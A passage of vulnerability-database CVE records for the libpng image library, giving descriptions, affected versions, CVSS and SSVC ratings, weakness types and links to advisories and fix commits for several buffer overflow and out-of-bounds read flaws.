{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-28T16:35:03.471007Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-28T16:35:43.323Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-27T15:30:31.952Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/pnggroup/libpng/issues/655"
},
{
"url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-28164",
"datePublished": "2026-01-27T00:00:00.000Z",
"dateReserved": "2025-03-11T00:00:00.000Z",
"dateUpdated": "2026-01-28T16:35:43.323Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-28162 (GCVE-0-2025-28162)
Vulnerability from nvd – Published: 2026-01-27 00:00 – Updated: 2026-01-29 14:45
VLAI?
Summary
Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via the pngimage with AddressSanitizer (ASan), the program leaks memory in various locations, eventually leading to high memory usage and causing the program to become unresponsive
Severity ?
5.5 (Medium)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-28162",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-29T14:44:12.627940Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-29T14:45:03.126Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via the pngimage with AddressSanitizer (ASan), the program leaks memory in various locations, eventually leading to high memory usage and causing the program to become unresponsive"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-27T15:49:47.958Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/pnggroup/libpng/issues/656"
},
{
"url": "https://gist.github.com/kittener/fbfdb9b5610c6b3db0d5dea045a07c60"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-28162",
"datePublished": "2026-01-27T00:00:00.000Z",
"dateReserved": "2025-03-11T00:00:00.000Z",
"dateUpdated": "2026-01-29T14:45:03.126Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-22801 (GCVE-0-2026-22801)
Vulnerability from nvd – Published: 2026-01-12 22:57 – Updated: 2026-01-13 19:37
VLAI?
Title
LIBPNG has an integer truncation causing heap buffer over-read in png_image_write_*
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54.
Severity ?
6.8 (Medium)
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-22801",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-13T19:37:38.282435Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T19:37:45.414Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190: Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-12T22:57:58.288Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8"
}
],
"source": {
"advisory": "GHSA-vgjq-8cw5-ggw8",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has an integer truncation causing heap buffer over-read in png_image_write_*"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-22801",
"datePublished": "2026-01-12T22:57:58.288Z",
"dateReserved": "2026-01-09T22:50:10.287Z",
"dateUpdated": "2026-01-13T19:37:45.414Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-22695 (GCVE-0-2026-22695)
Vulnerability from nvd – Published: 2026-01-12 22:55 – Updated: 2026-01-13 19:07
VLAI?
Title
LIBPNG has a heap buffer over-read in png_image_read_direct_scaled (regression from CVE-2025-65018 fix)
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.
Severity ?
6.1 (Medium)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-22695",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-13T14:13:00.487878Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T19:07:10.972Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-12T22:55:40.204Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp"
},
{
"name": "https://github.com/pnggroup/libpng/issues/778",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/778"
},
{
"name": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea"
},
{
"name": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2"
}
],
"source": {
"advisory": "GHSA-mmq5-27w3-rxpp",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has a heap buffer over-read in png_image_read_direct_scaled (regression from CVE-2025-65018 fix)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-22695",
"datePublished": "2026-01-12T22:55:40.204Z",
"dateReserved": "2026-01-08T19:23:09.855Z",
"dateUpdated": "2026-01-13T19:07:10.972Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-66293 (GCVE-0-2025-66293)
Vulnerability from nvd – Published: 2025-12-03 20:33 – Updated: 2025-12-04 01:31
VLAI?
Title
LIBPNG has an out-of-bounds read in png_image_read_composite
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later.
Severity ?
7.1 (High)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-66293",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-03T20:52:13.771582Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-03T20:55:03.573Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/issues/764"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-12-04T01:31:47.574Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/03/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/03/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/03/8"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.52"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng\u0027s simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng\u0027s internal state management. Upgrade to libpng 1.6.52 or later."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-03T20:33:57.086Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f"
},
{
"name": "https://github.com/pnggroup/libpng/issues/764",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/764"
},
{
"name": "https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1"
},
{
"name": "https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a"
}
],
"source": {
"advisory": "GHSA-9mpm-9pxh-mg4f",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has an out-of-bounds read in png_image_read_composite"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-66293",
"datePublished": "2025-12-03T20:33:57.086Z",
"dateReserved": "2025-11-26T23:11:46.392Z",
"dateUpdated": "2025-12-04T01:31:47.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-65018 (GCVE-0-2025-65018)
Vulnerability from nvd – Published: 2025-11-24 23:50 – Updated: 2025-11-25 19:29
VLAI?
Title
LIBPNG is vulnerable to a heap buffer overflow in `png_combine_row` triggered via `png_image_finish_read`
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51.
Severity ?
7.1 (High)
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-65018",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-25T19:29:28.950712Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-25T19:29:33.633Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/issues/755"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.6.0, \u003c 1.6.51"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122: Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-24T23:50:18.294Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g"
},
{
"name": "https://github.com/pnggroup/libpng/issues/755",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/755"
},
{
"name": "https://github.com/pnggroup/libpng/pull/757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/757"
},
{
"name": "https://github.com/pnggroup/libpng/commit/16b5e3823918840aae65c0a6da57c78a5a496a4d",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/16b5e3823918840aae65c0a6da57c78a5a496a4d"
},
{
"name": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea"
}
],
"source": {
"advisory": "GHSA-7wv6-48j4-hj3g",
"discovery": "UNKNOWN"
},
"title": "LIBPNG is vulnerable to a heap buffer overflow in `png_combine_row` triggered via `png_image_finish_read`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-65018",
"datePublished": "2025-11-24T23:50:18.294Z",
"dateReserved": "2025-11-13T15:36:51.680Z",
"dateUpdated": "2025-11-25T19:29:33.633Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-64720 (GCVE-0-2025-64720)
Vulnerability from nvd – Published: 2025-11-24 23:45 – Updated: 2025-11-25 19:28
VLAI?
Title
LIBPNG is vulnerable to a buffer overflow in `png_image_read_composite` via incorrect palette premultiplication
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, an out-of-bounds read vulnerability exists in png_image_read_composite when processing palette images with PNG_FLAG_OPTIMIZE_ALPHA enabled. The palette compositing code in png_init_read_transformations incorrectly applies background compositing during premultiplication, violating the invariant component ≤ alpha × 257 required by the simplified PNG API. This issue has been patched in version 1.6.51.
Severity ?
7.1 (High)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64720",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-25T19:28:16.806638Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-25T19:28:20.336Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-hfc7-ph9c-wcww"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.6.0, \u003c 1.6.51"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, an out-of-bounds read vulnerability exists in png_image_read_composite when processing palette images with PNG_FLAG_OPTIMIZE_ALPHA enabled. The palette compositing code in png_init_read_transformations incorrectly applies background compositing during premultiplication, violating the invariant component \u2264 alpha \u00d7 257 required by the simplified PNG API. This issue has been patched in version 1.6.51."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-24T23:45:38.315Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-hfc7-ph9c-wcww",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-hfc7-ph9c-wcww"
},
{
"name": "https://github.com/pnggroup/libpng/issues/686",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/686"
},
{
"name": "https://github.com/pnggroup/libpng/pull/751",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/751"
},
{
"name": "https://github.com/pnggroup/libpng/commit/08da33b4c88cfcd36e5a706558a8d7e0e4773643",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/08da33b4c88cfcd36e5a706558a8d7e0e4773643"
}
],
"source": {
"advisory": "GHSA-hfc7-ph9c-wcww",
"discovery": "UNKNOWN"
},
"title": "LIBPNG is vulnerable to a buffer overflow in `png_image_read_composite` via incorrect palette premultiplication"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64720",
"datePublished": "2025-11-24T23:45:38.315Z",
"dateReserved": "2025-11-10T14:07:42.922Z",
"dateUpdated": "2025-11-25T19:28:20.336Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-64506 (GCVE-0-2025-64506)
Vulnerability from nvd – Published: 2025-11-24 23:41 – Updated: 2025-11-25 19:27
VLAI?
Title
LIBPNG is vulnerable to a heap buffer over-read in `png_write_image_8bit` with grayscale+alpha or RGB/RGBA images
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51.
Severity ?
6.1 (Medium)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64506",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-25T19:26:55.005617Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-25T19:27:04.161Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.6.0, \u003c 1.6.51"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng\u0027s png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-24T23:41:09.207Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6"
},
{
"name": "https://github.com/pnggroup/libpng/pull/749",
"tags": [
